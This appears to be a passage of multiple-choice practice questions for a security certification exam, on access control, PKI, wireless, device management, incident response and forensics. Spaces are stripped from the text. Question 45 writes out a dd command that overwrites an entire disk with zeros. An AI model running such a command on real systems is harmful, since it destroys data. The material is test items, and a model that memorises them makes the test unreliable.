169. Chriswantstosecurelygenerateandstorecryptographickeysforhisorganization'sservers,whilealsoprovidingtheabilitytooffloadTLSencryptionprocessing.Whattypeofsolutionshouldherecommend?

A. AGPUincryptographicaccelerationmode

B. ATPM

C. AHSM

D. ACPUincryptographicaccelerationmode

170. Tracywantstoprotectdesktopandlaptopsystemsinherorganizationfromnetworkattacks.Shewantstodeployatoolthatcanactivelystopattacksbasedonsignatures,heuristics,andanomalies.Whattypeoftoolshouldshedeploy?

A. Afirewall

B. Antimalware

C. HIDS

D. HIPS

171. Whichofthefollowingaccesscontrolmethodsgrantspermissionsbasedontheuser'spositionintheorganization?

A. MAC

B. RBAC

C. DAC

D. ABAC


172. WhatdoesUEFImeasuredbootdo?

A. Recordshowlongittakesforasystemtobootup

B. Recordsinformationabouteachcomponentthatisloaded,storesitintheTPM,andcanreportittoaserver

C. ComparesthehashofeverycomponentthatisloadedagainstaknownhashstoredintheTPM

D. ChecksforupdatedversionsoftheUEFI,andcomparesittothecurrentversion;ifitismeasuredasbeingtoofaroutofdate,itupdatestheUEFI

173. Kerberosuseswhichofthefollowingtoissuetickets?

A. Authenticationservice

B. Certificateauthority

C. Ticket-grantingservice

D. Keydistributioncenter

174. Mariawantstoensurethatherwirelesscontrollerandaccesspointsareassecureaspossiblefromattackviahernetwork.Whatcontrolshouldsheputinplacetoprotectthemfrombrute-forcepasswordattacksandsimilarattemptstotakeoverherwirelessnetwork'shardwareinfrastructure?

A. Regularlypatchthedevices.

B. Disableadministrativeaccess.

C. PuttheaccesspointsandcontrollersonaseparatemanagementVLAN.

D. Alloftheabove

175. Marcuswantstocheckonthestatusofcarrierunlockingforallmobilephonesownedbyanddeployedbyhiscompany.Whatmethodisthemosteffectivewaytodothis?

A. Contactthecellularprovider.

B. UseanMDMtool.

C. UseaUEMtool.

D. Noneoftheabove;carrierunlockmustbeverifiedmanuallyonthe


phone.

176. Michaelwantstoimplementazero-trustnetwork.Whichofthefollowingstepsisnotacommonstepinestablishingazerotrustnetwork?

A. Simplifythenetwork.

B. Usestrongidentityandaccessmanagement.

C. Configurefirewallsforleastprivilegeandapplicationawareness.

D. Logsecurityeventsandanalyzethem.

177. SamanthaislookingforanauthenticationmethodthatincorporatestheX.509standardandwillallowauthenticationtobedigitallysigned.Whichofthefollowingauthenticationmethodswouldbestmeettheserequirements?

A. Certificate-basedauthentication

B. OAuth

C. Kerberos

D. Smartcards

178. YourcompanyreliesheavilyoncloudandSaaSserviceproviderssuchassalesforce.com,Office365,andGoogle.Whichofthefollowingwouldyouhavesecurityconcernsabout?

A. LDAP

B. TACACS+

C. SAML

D. Transitivetrust

179. WhatistheprimarydifferencebetweenMDMandUEM?

A. MDMdoesnotincludepatchmanagement.

B. UEMdoesnotincludesupportformobiledevices.

C. UEMsupportsabroaderrangeofdevices.

D. MDMpatchesdomainmachines,notenterprisemachines.

180. Kathleenwantstoimplementazero-trustnetworkdesignandknowsthatsheshouldsegmentthenetwork.Sheremainsworriedabouteast/westtrafficinsidethenetworksegments.Whatisthefirstsecuritytoolshe


http://salesforce.com

shouldimplementtoensurehostsremainsecurefromnetworkthreats?

A. Antivirus

B. Host-basedfirewalls

C. Host-basedIPS

D. FDE

181. Garyisdesigninghiscloudinfrastructureandneedstoprovideafirewall-likecapabilityforthevirtualsystemsheisrunning.Whichofthefollowingcloudcapabilitiesactslikeavirtualfirewall?

A. Securitygroups

B. Dynamicresourceallocation

C. VPCendpoints

D. Instanceawareness

182. DerekhasenabledautomaticupdatesfortheWindowssystemsthatareusedinthesmallbusinessheworksfor.Whathardeningprocesswillstillneedtobetackledforthosesystemsifhewantsacompletepatchmanagementsystem?

A. AutomatedinstallationofWindowspatches

B. WindowsUpdateregressiontesting

C. Registryhardening

D. Third-partysoftwareandfirmwarepatching

183. Theresaimplementsanetwork-basedIDS.WhatcanshedototrafficthatpassesthroughtheIDS?

A. Reviewthetrafficbasedonrulesanddetectandalertaboutunwantedorundesirabletraffic.

B. Reviewthetrafficbasedonrulesanddetectandstoptrafficbasedonthoserules.

C. DetectsensitivedatabeingsenttotheoutsideworldandencryptitasitpassesthroughtheIDS.

D. Alloftheabove

184. Muraliisbuildinghisorganization'scontainersecuritybestpractices


documentandwantstoensurethathecoversthemostcommonitemsforcontainersecurity.Whichofthefollowingisnotaspecificconcernforcontainers?

A. Thesecurityofthecontainerhost

B. Securingthemanagementstackforthecontainer

C. Insiderthreats

D. Monitoringnetworktraffictoandfromthecontainersforthreatsandattacks

185. Gary'sorganizationusesaNATgatewayatitsnetworkedge.WhatsecuritybenefitdoesaNATgatewayprovide?

A. Itstatefullyblockstrafficbasedonportandprotocolasatypeoffirewall.

B. Itcandetectmalicioustrafficandstopitfrompassingthrough.

C. Itallowssystemstoconnecttoanothernetworkwithoutbeingdirectlyexposedtoit.

D. Itallowsnon-IP-basedaddressestobeusedbehindalegitimateIPaddress.

186. Fredsetsuphisauthenticationandauthorizationsystemtoapplythefollowingrulestoauthenticatedusers:

Userswhoarenotlogginginfrominsidethetrustednetworkmustusemultifactorauthentication.

UserswhosedeviceshavenotpassedaNACcheckmustusemultifactorauthentication.

Userswhohaveloggedinfromgeographiclocationsthataremorethan100milesapartwithin15minuteswillbedenied.

WhattypeofaccesscontrolisFredusing?

A. Geofencing

B. Time-basedlogins

C. Conditionalaccess

D. Role-basedaccess


187. HenryisanemployeeatAcmeCompany.Thecompanyrequireshimtochangehispasswordeverythreemonths.Hehastroublerememberingnewpasswords,sohekeepsswitchingbetweenjusttwopasswords.Whichpolicywouldbemosteffectiveinpreventingthis?

A. Passwordcomplexity

B. Passwordhistory

C. Passwordlength

D. Multifactorauthentication

188. ThefollowingimageshowsascenariowhereSwitchXisattachedtoanetworkbyanenduserandadvertisesitselfwithalowerspanningtreeprioritythantheexistingswitches.Whichofthefollowingsettingscanpreventthistypeofissuefromoccurring?

A. 802.11n

B. Portrecall

C. RIPguard

D. BPDUguard

189. TracywantstolimitwhenuserscanlogintoastandaloneWindowsworkstation.WhatcanTracydotomakesurethatanaccountcalled“visitor”canonlyloginbetween8a.m.and5p.m.everyweekday?


A. Runningthecommandnetuservisitor/time:M-F,8am-5pm

B. Runningthecommandnetreguservisitor-daily-working-hours

C. Runningthecommandloginlimit:dailytime:

D. 8-5

E. ThiscannotbedonefromtheWindowscommandline.

190. Sheilaisconcernedthatsomeusersonhernetworkmaybeaccessingfilesthattheyshouldnot—specifically,filesthatarenotrequiredfortheirjobtasks.Whichofthefollowingwouldbemosteffectiveindeterminingifthisishappening?

A. Usageauditingandreview

B. Permissionsauditingandreview

C. Accountmaintenance

D. Policyreview

191. Inwhichofthefollowingscenarioswouldusingasharedaccountposetheleastsecurityrisk?

A. Foragroupoftechsupportpersonnel

B. ForguestWi-Fiaccess

C. Forstudentslogginginatauniversity

D. Foraccountswithfewprivileges

192. Mike'smanagerhasaskedhimtoverifythatthecertificatechainfortheirproductionwebsiteisvalid.WhathassheaskedMiketovalidate?

A. Thatthecertificatehasnotbeenrevoked

B. ThatuserswhovisitthewebsitecanverifythatthesiteandtheCAsinthechainarealltrustworthy

C. Thattheencryptionusedtocreatethecertificateisstrongandhasnotbeencracked

D. Thatthecertificatewasissuedproperlyandthatpriorcertificatesissuedforthesamesystemhavealsobeenissuedproperly

193. Mariaisresponsibleforsecurityatasmallcompany.Sheisconcerned


aboutunauthorizeddevicesbeingconnectedtothenetwork.Sheislookingforadeviceauthenticationprocess.Whichofthefollowingwouldbethebestchoiceforher?

A. CHAP

B. Kerberos

C. 802.11i

D. 802.1X

194. WhichwirelessstandardusesCCMPtoprovideencryptionfornetworktraffic?

A. WPA2

B. WEP

C. Infrared

D. Bluetooth

195. CharlesisaCISOforaninsurancecompany.Herecentlyreadaboutanattackwhereinanattackerwasabletoenumerateallthenetworkdevicesinanorganization.Allthiswasdonebysendingqueriesusingasingleprotocol.WhichprotocolshouldCharlessecuretomitigatethisattack?

A. SNMP

B. POP3

C. DHCP

D. IMAP

196. Magnusisconcernedaboutsomeoneusingapasswordcrackeroncomputersinhiscompany.Heisconcernedthatcrackerswillattemptcommonpasswordsinordertologintoasystem.Whichofthefollowingwouldbebestformitigatingthisthreat?

A. Passwordagerestrictions

B. Passwordminimumlengthrequirements

C. Accountlockoutpolicies

D. Accountusageauditing

197. LucasislookingforanXML-basedopenstandardforexchanging


authenticationinformation.Whichofthefollowingwouldbestmeethisneeds?

A. SAML

B. OAuth

C. RADIUS

D. NTLM

198. Joshuaislookingforanauthenticationprotocolthatwouldbeeffectiveatstoppingsessionhijacking.Whichofthefollowingwouldbehisbestchoice?

A. CHAP

B. PAP

C. TACACS+

D. RADIUS

199. Greg'scompanyhasaremotelocationthatusesanIP-basedstreamingsecuritycamerasystem.HowcouldGregensurethattheremotelocation'snetworkeddevicescanbemanagedasiftheyarelocaldevicesandthatthetraffictothatremotelocationissecure?

A. Anas-neededTLSVPN

B. Analways-onTLSVPN

C. Analways-onIPSecVPN

D. Anas-neededIPSecVPN

200. WhatdoestheOPALstandardspecify?

A. Onlinepersonalaccesslicenses

B. Self-encryptingdrives

C. Theoriginofpersonalaccountsandlibraries

D. Drivesanitizationmodesfordegaussers

201. WhatdoesUnifiedExtensibleFirmwareInterface(UEFI)SecureBootdo?

A. Itprotectsagainstwormsduringthebootprocess.

B. Itvalidatesasignatureforeachbinaryloadedduringboot.


C. ItvalidatesthesystemBIOSversion.

D. Alloftheabove

202. Derekistryingtoselectanauthenticationmethodforhiscompany.HeneedsonethatwillworkwithabroadrangeofserviceslikethoseprovidedbyMicrosoftandGooglesothatuserscanbringtheirownidentities.Whichofthefollowingwouldbehisbestchoice?

A. Shibboleth

B. RADIUS

C. OpenIDConnect

D. OAuth

203. Jasonisconsideringdeployinganetworkintrusionpreventionsystem(IPS)andwantstobeabletodetectadvancedpersistentthreats.WhattypeofIPSdetectionmethodismostlikelytodetectthebehaviorsofanAPTafterithasgatheredbaselineinformationaboutnormaloperations?

A. Signature-basedIPSdetections

B. Heuristic-basedIPSdetections

C. MalicioustoolhashIPSdetections

D. Anomaly-basedIPSdetections

204. WhatcomponentismostoftenusedasthefoundationforahardwarerootoftrustforamodernPC?

A. TheCPU

B. ATPM

C. AHSM

D. TheharddriveorSSD

205. DenniswantstodeployafirewallthatcanprovideURLfiltering.Whattypeoffirewallshouldhedeploy?

A. Apacketfilter

B. Astatefulpacketinspectionfirewall

C. Anext-generationfirewall

D. Noneoftheabove


206. Waleed'sorganizationusesacombinationofinternallydevelopedandcommercialapplicationsthattheydeploytomobiledevicesusedbystaffthroughoutthecompany.Whattypeoftoolcanheusetohandleacombinationofbring-your-own-devicephonesandcorporatetabletsthatneedtohavetheseapplicationsloadedontothemandremovedfromthemwhentheirusersarenolongerpartoftheorganization?

A. MOM

B. MLM

C. MIM

D. MAM

207. Charleneispreparingareportonthemostcommonapplicationsecurityissuesforcloudapplications.Whichofthefollowingisnotamajorconcernforcloudapplications?

A. Localmachineaccessleadingtocompromise

B. Misconfigurationoftheapplication

C. InsecureAPIs

D. Accountcompromise

208. TheCAthatSamanthaisresponsibleforiskeptphysicallyisolatedandisneverconnectedtoanetwork.Whencertificatesareissued,theyaregeneratedthenmanuallytransferredviaremovablemedia.WhattypeofCAisthis,andwhywouldSamantha'sorganizationrunaCAinthismode?

A. AnonlineCA;itisfastertogenerateandprovidecertificates.

B. AnofflineCA;itisfastertogenerateandprovidecertificates.

C. AnonlineCA;itpreventspotentialexposureoftheCA'srootcertificate.

D. AnofflineCA;itpreventspotentialexposureoftheCA'srootcertificate.

209. Susanhasconfiguredavirtualprivatenetwork(VPN)sothattrafficdestinedforsystemsonhercorporatenetworkisroutedovertheVPNbuttrafficsenttootherdestinationsissentoutviatheVPNuser'slocalnetwork.Whatisthisconfigurationcalled?


A. Half-pipe

B. Full-tunnel

C. Split-tunnel

D. Splithorizon

210. Adamhasexperiencedproblemswithuserspluggingincablesbetweenswitchesonhisnetwork,whichresultsinmultiplepathstothesamedestinationsbeingavailabletosystemsonthenetwork.Whenthisoccurs,thenetworkexperiencesbroadcaststorms,causingnetworkoutages.Whatnetworkconfigurationsettingshouldheenableonhisswitchestopreventthis?

A. Loopprotection

B. Stormwatch

C. Stickyports

D. Portinspection

211. CharlesisconcernedthatusersofAndroiddevicesinhiscompanyaredelayingOTAupdates.WhywouldCharlesbeconcernedaboutthis,andwhatshouldhedoaboutit?

A. OTAupdatespatchapplications,andaNACagentwouldreportonallphonesintheorganization.

B. OTAupdatesupdatedeviceencryptionkeysandarenecessaryforsecurity,andaPKIwouldtrackencryptioncertificatesandkeys.

C. OTAupdatespatchfirmwareandupdatesphoneconfigurations,andanMDMtoolwouldprovidereportsonfirmwareversionsandphonesettings

D. OTAupdatesaresentbyphonestoreportononlineactivityandtracking,andanMDMtoolreceivesOTAupdatestomonitorphones

212. Benispreparingtoimplementafirewallforhisnetworkandisconsideringwhethertoimplementanopensourcefirewalloraproprietarycommercialfirewall.Whichofthefollowingisnotanadvantageofanopensourcefirewall?

A. Lowercost

B. Communitycodevalidation


C. Maintenanceandsupport

D. Speedofacquisition

213. BarbarawantstoimplementWPA3Personal.WhichofthefollowingfeaturesisamajorsecurityimprovementinWPA3overWPA2?

A. DDoSmonitoringandprevention

B. Per-channelsecurity

C. Brute-forceattackprevention

D. Improvementsfrom64-bitto128-bitencryption

214. IsaacwantstoimplementmandatoryaccesscontrolsonanAndroid-baseddevice.Whatcanhedotoaccomplishthis?

A. RunAndroidinsingle-usermode.

B. UseSEAndroid.

C. ChangetheAndroidregistrytoMACmode.

D. InstallMACDroid.

215. Greghasimplementedasystemthatallowsuserstoaccessaccountslikeadministratorandrootwithoutknowingtheactualpasswordsfortheaccounts.Whenusersattempttouseelevatedaccounts,theirrequestiscomparedtopoliciesthatdetermineiftherequestshouldbeallowed.Thesystemgeneratesanewpasswordeachtimeatrusteduserrequestsaccess,andthenlogstheaccessrequest.WhattypeofsystemhasGregimplemented?

A. AMACsystem

B. APAMsystem

C. AFDEsystem

D. ATLSsystem

216. AlainahasissuedAndroidtabletstostaffinherproductionfacility,butcamerasarebannedduetosensitivedatainthebuilding.Whattypeoftoolcansheusetocontrolcamerauseonallofherorganization'scorporatedevicesthatsheissues?

A. MDM


B. DLP

C. OPAL

D. MMC

217. Oliviawantstoenforceawidevarietyofsettingsfordevicesusedinherorganization.WhichofthefollowingmethodsshouldsheselectifsheneedstomanagehundredsofdeviceswhilesettingrulesforuseofSMSandMMS,audioandvideorecording,GPStagging,andwirelessconnectionmethodsliketetheringandhotspotmodes?

A. Usebaselinesettingsautomaticallysetforeveryphonebeforeitisdeployedusinganimagingtool.

B. Requireuserstoconfiguretheirphonesusingalockdownguide.

C. UseaUEMtoolandapplicationtomanagethedevices.

D. UseaCASBtooltomanagethedevices.

218. Johnwantstodeployasolutionthatwillprovidecontentfilteringforwebapplications,CASBfunctionality,DLP,andthreatprotection.Whattypeofsolutioncanhedeploytoprovidethesefeatures?

A. Areverseproxy

B. AVPCgateway

C. AnNGSWG

D. Anext-genfirewall

219. BrianwantstolimitaccesstoafederatedservicethatusesSingleSign-Onbasedonuserattributesandgroupmembership,aswellaswhichfederationmembertheuserislogginginfrom.Whichofthefollowingoptionsisbestsuitedtohisneeds?

A. Geolocation

B. Accountauditing

C. Accesspolicies

D. Time-basedlogins

220. SharifusesthechmodcommandinLinuxtosetthepermissionstoafileusingthecommandchmod700example.txt.Whatpermissionhashesetonthefile?


A. Allusershavewriteaccesstothefile.

B. Theuserhasfullaccesstothefile.

C. Allusershaveexecuteaccesstothefile.

D. Theuserhasexecuteaccesstothefile.

221. Patrickregularlyconnectstountrustednetworkswhenhetravelsandisconcernedthatanon-pathattackcouldbeexecutedagainsthimashebrowseswebsites.Hewouldliketovalidatecertificatesagainstknowncertificatesforthosewebsites.Whattechniquecanheusetodothis?

A. ChecktheCRL.

B. Usecertificatepinning.

C. Comparehisprivatekeytotheirpublickey.

D. Comparetheirprivatekeytotheirpublickey.

222. Whatisthemostcommonformatforcertificatesissuedbycertificateauthorities?

A. DER

B. PFX

C. PEM

D. P7B

223. Michelle'sorganizationusesself-signedcertificatesthroughoutitsinternalinfrastructure.Afteracompromise,Michelleneedstorevokeoneoftheself-signedcertificates.Howcanshedothat?

A. Contactthecertificateauthorityandrequestthattheyrevokethecertificate.

B. AddthecertificatetotheCRL.

C. Removethecertificatefromthelistofwhitelistedcertificatesfromeachmachinethattrustsit.

D. Reissuethecertificate,causingtheoldversiontobeinvalidated.

224. Whichofthefollowingisnotacommonwaytovalidatecontroloveradomainforadomain-validatedX.509certificate?

A. ChangingtheDNSTXTrecord


B. Respondingtoanemailsenttoacontactinthedomain'sWHOISinformation

C. Publishinganonceprovidedbythecertificateauthorityaspartofthedomaininformation

D. ChangingtheIPaddressesassociatedwiththedomain

225. FionaknowsthatSNMPv3providesadditionalsecurityfeaturesthatpreviousversionsofSNMPdidnot.WhichofthefollowingisnotasecurityfeatureprovidedbySNMPv3?

A. SQLinjectionprevention

B. Messageintegrity

C. Messageauthentication

D. Messageconfidentiality

226. Thefollowingfigureshowsaproxyinuse.Inthisusagemodel,theproxyreceivesaconnectionrequest,andthenconnectstotheserverandforwardstheoriginalrequest.Whattypeofproxyisthis?

A. Areverseproxy

B. Around-robinproxy

C. Anext-generationproxy

D. Aforwardproxy


Chapter4OperationsandIncidentResponse


4.1 Givenascenario,usetheappropriatetooltoassessorganizationalsecurity

4.2 Summarizetheimportanceofpolicies,processes,andproceduresforincidentresponse

4.3 Givenanincident,utilizeappropriatedatasourcestosupportaninvestigation

4.4 Givenanincident,applymitigationtechniquesorcontrolstosecureanenvironment

4.5 Explainthekeyaspectsofdigitalforensics

1. Milawantstogenerateauniquedigitalfingerprintforafile,andneedstochoosebetweenachecksumandahash.Whichoptionshouldshechooseandwhyshouldshechooseit?

A. Ahash,becauseitisuniquetothefile

B. Achecksum,becauseitverifiesthecontentsofthefile

C. Ahash,becauseitcanbereversedtovalidatethefile

D. Achecksum,becauseitislesspronetocollisionsthanahash

2. Whichofthefollowingwouldpreventauserfrominstallingaprogramonacompany-ownedmobiledevice?

A. Anallowlist

B. Adenylist

C. ACL

D. HIDS


3. Liamisresponsibleformonitoringsecurityeventsinhiscompany.Hewantstoseehowdiverseeventsmayconnectusinghissecurityinformationandeventmanagement(SIEM).Heisinterestedinidentifyingdifferentindicatorsofcompromisethatmaypointtothesamebreach.Whichofthefollowingwouldbemosthelpfulforhimtoimplement?

A. NIDS

B. PKI

C. Acorrelationdashboard

D. Atrenddashboard

4. EmilywantstocaptureHTTPSpacketsusingtcpdump.IftheserviceisrunningonitsdefaultportandherEthernetadapteriseth0,whichtcpdumpcommandshouldsheuse?

A. tcpdumpeth0-protohttps

B. tcpdump-ieth0-protohttps

C. tcpdumptcphttpseth0

D. tcpdump-ieth0tcpport443

5. Milagivesherteamascenario,andthenasksthemquestionsabouthowtheywouldrespond,whatissuestheyexpecttheymightencounter,andhowtheywouldhandlethoseissues.Whattypeofexercisehassheconducted?

A. Atabletopexercise

B. Awalk-through

C. Asimulation

D. Adrill

6. Muraliispreparingtoacquiredatafromvariousdevicesandsystemsthataretargetsinaforensicinvestigation.Whichofthefollowingdevicesistheleastvolatileaccordingtotheorderofvolatility?

A. Backups

B. CPUcache

C. Localdisk

D. RAM


7. Henryhasbeenaskedforvulnerabilityscanresultsbyanincidentresponder.Heiscurioustoknowwhytheresponderneedsscanresults.Whatanswerwouldyouprovidetohimtoexplainwhyscanresultsareneededandareuseful?

A. Thescanswillshowtheprogramstheattackersused.

B. Thescanswillshowtheversionsofsoftwareinstalledbeforetheattack.

C. Vulnerableserviceswillprovidecluesaboutwhattheattackersmayhavetargeted.

D. Thescanswillshowwherefirewallsandothernetworkdeviceswereinplacetohelpwithincidentanalysis.

8. WhatphaseoftheincidentresponseprocessshouldbeplacedatpointAinthefollowingimage?

A. Simulations

B. Review


C. Recovery

D. Patching

9. NickisreviewingcommandsrunonaWindows10systemanddiscoversthattheroutecommandwasrunwiththe-pflag.Whatoccurred?

A. Routeswerediscoveredusingapingcommand.

B. Theroute'spathwillbedisplayed.

C. Aroutewasaddedthatwillpersistbetweenboots.

D. Aroutewasaddedthatwillusethepathlistedinthecommand.

10. LuccawantstoacquireopensourceintelligenceinformationusinganautomatedtoolthatcanleveragesearchenginesandtoolslikeShodan.Whichofthefollowingtoolsshouldheselect?

A. curl

B. hping

C. netcat

D. theHarvester

11. Brentwantstouseatooltohelphimanalyzemalwareandattacksandwantstocoverabroadrangeoftacticsandtoolsthatareusedbyadversaries.Whichofthefollowingisbroadlyimplementedintechnicaltoolsandcoverstechniquesandtacticswithoutrequiringaspecificorderofoperations?

A. TheDiamondModelofIntrusionAnalysis

B. TheCyberKillChain

C. TheMITREATT&CKframework

D. TheCVSSstandard

12. Tedneedstopreserveaserverforforensicpurposes.Whichofthefollowingshouldhenotdo?

A. Turnthesystemofftoensurethatdatadoesnotchange.

B. Removethedrivewhilethesystemisrunningtoensurethatdatadoesnotchange.

C. Leavethemachineconnectedtothenetworksothatuserscancontinue


touseit.

D. Alloftheabove

13. Whatmitigationtechniqueisusedtolimittheabilityofanattacktocontinuewhilekeepingsystemsandservicesonline?

A. Segmentation

B. Isolation

C. Nuking

D. Containment

14. JessicawantstoreviewthenetworktrafficthatherWindowssystemhassenttodetermineifafilecontainingsensitivedatawasuploadedfromthesystem.WhatWindowslogfilecansheusetofindthisinformation?

A. Theapplicationlog

B. Thenetworklog

C. Thesecuritylog

D. Noneoftheabove

15. Whattermisusedtodescribethedocumentationtrailforcontrol,analysis,transfer,andfinaldispositionofevidencefordigitalforensicwork?

A. Evidencelog

B. Papertrail

C. Chainofcustody

D. Digitalfootprint

16. Henrywantstodeterminewhatservicesareonanetworkthatheisassessing.Whichofthefollowingtoolswillprovidehimwithalistofservices,ports,andtheirstatus?

A. nmap

B. route

C. hping

D. netstat

17. Nathanneedstoknowhowmanytimesaneventoccurredandwantsto


checkalogfileforthatevent.Whichofthefollowinggrepcommandswilltellhimhowmanytimestheeventhappenedifeachoccurrenceisloggedindependentlyinthelogfile.txtlogfile,andusesauniqueeventID:event101?

A. greplogfile.txt-n'event101'

B. grep-c'event101'logfile.txt

C. greplogfile.txt-c'event101'

D. grep-cevent101-ilogfile.txt

18. Jacobwantstoensurethatalloftheareasthatareimpactedbyanincidentareaddressedbyhisincidentresponseteam.Whattermisusedtodescribetherelationshipandcommunicationsprocessthatteamsusetoensurethatallofthoseinvolvedaretreatedappropriately?

A. COOP

B. Stakeholdermanagement

C. PAM

D. Communicationsplanning

19. WhileSusanisconductingaforensicreviewoflogsfromtwoservershostedinthesamedatacenter,shenoticesthatlogitemsonthefirstserveroccurredexactlyanhourbeforematchingeventsonthesecondserver.Whatisthemostlikelycauseofsuchexactoccurrences?

A. Theattacktookanhourtocomplete,providingtheattackerwithaccesstothesecondmachineanhourlater.

B. Thelogentriesareincorrect,causingtheeventstoappearatthewrongtime.

C. Theattackerusedascriptcausingeventstohappenexactlyanhourapart.

D. Atimeoffsetiscausingtheeventstoappeartooccuratdifferenttimes.

20. WhatistheprimaryusageofDomainNameSystem(DNS)datainincidentinvestigationsandoperationalsecuritymonitoring?

A. DNSdataisusedtocapturenetworkscans.

B. DNSdatacanbeusedtoidentifydomaintransferattacks.


C. DNSloginformationcanbeusedtoidentifymalwaregoingtoknownmalicioussites.

D. DNSloginformationcanbeusedtoidentifyunauthorizedlogins.

21. DanigeneratesanOpenSSLcertificateusingthefollowingcommand.Whathasshesetwiththeflag-rsa:2048?

opensslreq-x509-sha256-nodes-days365-newkeyrsa:2048

-keyoutprivateKey.key-outmycert.crt

A. Theyearthatthecertificatewillexpire

B. Thekeylengthinbytes

C. Theyearthattherootcertificatewillexpire

D. Thekeylengthinbits

22. Theresawantstoviewthelast10linesofalogfileandtoseeitchangeasmodificationsaremade.WhatcommandshouldsherunontheLinuxsystemsheisloggedinto?

A. head-f-end10logfile.log

B. tail-flogfile.log

C. foot-watch-l10logfile.log

D. follow-tail10logfile.log

23. Henrywantstoacquirethefirmwarefromarunningsystem.Whatisthemostlikelytechniquethathewillneedtousetoacquirethefirmware?

A. Connectusingaserialcable.

B. Acquirethefirmwarefrommemoryusingmemoryforensicstools.

C. Acquirethefirmwarefromdiskusingdiskforensictools.

D. Noneoftheabove

24. Ericwantstodeterminehowmuchbandwidthwasusedduringacompromiseandwherethetrafficwasdirectedto.Whattechnologycanheimplementbeforetheeventtohelphimseethisdetailandallowhimtohaveaneffectivebandwidthmonitoringsolution?

A. Afirewall

B. NetFlow


C. packetflow

D. ADLP

25. Naomihasacquiredanimageofadriveaspartofaforensicprocess.Shewantstoensurethatthedriveimagematchestheoriginal.Whatshouldshecreateandrecordtovalidatethis?

A. Athirdimagetocomparetotheoriginalandnewimage

B. Adirectorylistingtoshowthatthedirectoriesmatch

C. Aphotographicimageofthetwodrivestoshowthattheymatch

D. Ahashofthedrivestoshowthattheirhashesmatch

26. RyanhasbeenaskedtorunNessusonhisnetwork.Whattypeoftoolhashebeenaskedtorun?

A. Afuzzer

B. Avulnerabilityscanner

C. AWAF

D. Aprotocolanalyzer

27. Jasonwantstoensurethatthedigitalevidenceheiscollectingduringhisforensicinvestigationisadmissible.Whichofthefollowingisacommonrequirementforadmissibilityofevidence?

A. Itmustberelevant.

B. Itmustbehearsay.

C. Itmustbetimely.

D. Itmustbepublic.

28. Whichofthefollowingkeyelementsisnottypicallyincludedinthedesignofacommunicationplan?

A. Incidentseverity

B. Customerimpact

C. Employeeimpact

D. Costtotheorganization

29. Rickrunsthefollowingcommand:


catfile1.txtfile2.txt

Whatwilloccur?

A. Thecontentsoffile1.txtwillbeappendedtofile2.txt.

B. Thecontentsoffile1.txtwillbedisplayed,andthenthecontentsoffile2willbedisplayed.

C. Thecontentsoffile2.txtwillbeappendedtofile1.txt.

D. Thecontentsofbothfileswillbecombinedlinebyline.

30. MichellewantstocheckforauthenticationfailuresonaCentOSLinux–basedsystem.Whereshouldshelookfortheseeventlogs?

A. /var/log/auth.log

B. /var/log/fail

C. /var/log/events

D. /var/log/secure

31. Awebpage'stitleisconsideredwhattypeofinformationaboutthepage?

A. Summary

B. Metadata

C. Headerdata

D. Hiddendata

32. Nelsonhasdiscoveredmalwareononeofthesystemsheisresponsibleforandwantstotestitinasafeenvironment.Whichofthefollowingtoolsisbestsuitedtothattesting?

A. strings

B. scanless

C. Cuckoo

D. Sn1per

33. Luccawantstoviewmetadataforafilesothathecandeterminetheauthorofthefile.Whattoolshouldheusefromthefollowinglist?

A. Autopsy

B. strings


C. exiftool

D. grep

34. Isaacwantstoacquireanimageofasystemthatincludestheoperatingsystem.WhattoolcanheuseonaWindowssystemthatcanalsocapturelivememory?

A. dd

B. FTKImager

C. Autopsy

D. WinDump

35. Jasonisconductingaforensicinvestigationandhasretrievedartifactsinadditiontodrivesandfiles.Whatshouldhedotodocumenttheartifactshehasacquired?

A. ImagethemusingddandensurethatavalidMD5sumisgenerated.

B. Takeapictureofthem,labelthem,andaddthemtothechainofcustodydocumentation.

C. Contactlawenforcementtoproperlyhandletheartifacts.

D. Engagelegalcounseltoadvisehimhowtohandleartifactsinaninvestigation.

36. Garywantstocheckforthemailserversforexample.com.Whattoolandcommandcanheusetodeterminethis?

A. nslookup-query=mxexample.com

B. ping-emailexample.com

C. smtp-mxexample.com

D. email-lookup-mxexample.com

37. WhichofthefollowingisbestsuitedtoanalyzingliveSIPtraffic?

A. Logfiles

B. Wireshark

C. Nessus

D. SIPper


http://example.com

38. Andreawantstoidentifyservicesonaremotemachineandwantstheservicestobelabeledwithservicenamesandothercommondetails.Whichofthefollowingtoolswillnotprovidethatinformation?

A. netcat

B. Sn1per

C. Nessus

D. nmap

39. Josephiswritingaforensicreportandwantstobesureheincludesappropriatedetail.Whichofthefollowingwouldnottypicallybeincludedwhilediscussinganalysisofasystem?

A. Validationofthesystemclock'stimesettings

B. Theoperatingsysteminuse

C. Themethodsusedtocreatetheimage

D. Apictureofthepersonfromwhomthesystemwastaken

40. Gregbelievesanattackerhasbeenusingabrute-forcepasswordattackagainstaLinuxsystemheisresponsiblefor.Whatcommandcouldheusetodetermineifthisisthecase?

A. grep"Failedpassword"/var/log/auth.log

B. tail/etc/bruteforce.log

C. head/etc/bruteforce.log

D. grep"Failedlogin"/etc/log/auth.log

41. Elainewantstodeterminewhatwebsitesauserhasrecentlyvisitedusingthecontentsofaforensicallyacquiredharddrive.Whichofthefollowinglocationswouldnotbeusefulforherinvestigation?

A. Thebrowsercache

B. Thebrowserhistory

C. Thebrowser'sbookmarks

D. Sessiondata

42. Jasonwantstoacquirenetworkforensicdata.Whattoolshouldheusetogatherthisinformation?


A. nmap

B. Nessus

C. Wireshark

D. SNMP

43. Ananthhasbeentoldthatattackerssometimesusepingtomapnetworks.Whatinformationreturnedbypingcouldbemosteffectivelyusedtodeterminenetworktopology?

A. TTL

B. Packetssent

C. Packetsreceived

D. Transittime

44. Susanhasdiscoveredevidenceofacompromisethatoccurredapproximatelyfivemonthsago.Shewantstoconductanincidentinvestigationbutisconcernedaboutwhetherthedatawillexist.Whatpolicyguideshowlonglogsandotherdataarekeptinmostorganizations?

A. Theorganization'sdataclassificationpolicy

B. Theorganization'sbackuppolicy

C. Theorganization'sretentionpolicy

D. Theorganization'slegalholdpolicy

45. Selahexecutesthefollowingcommandonasystem.Whathassheaccomplished?

ddif=/dev/zeroof=/dev/sdabs=4096

A. Copyingthedisk/dev/zerotothedisk/dev/sda

B. Formatting/dev/sda

C. Writingzeroestoallof/dev/sda

D. Cloning/dev/sda1

46. Jimispreparingapresentationabouthisorganization'sincidentresponseprocessandwantstoexplainwhycommunicationswithinvolvedgroupsandindividualsacrosstheorganizationareimportant.Whichofthe


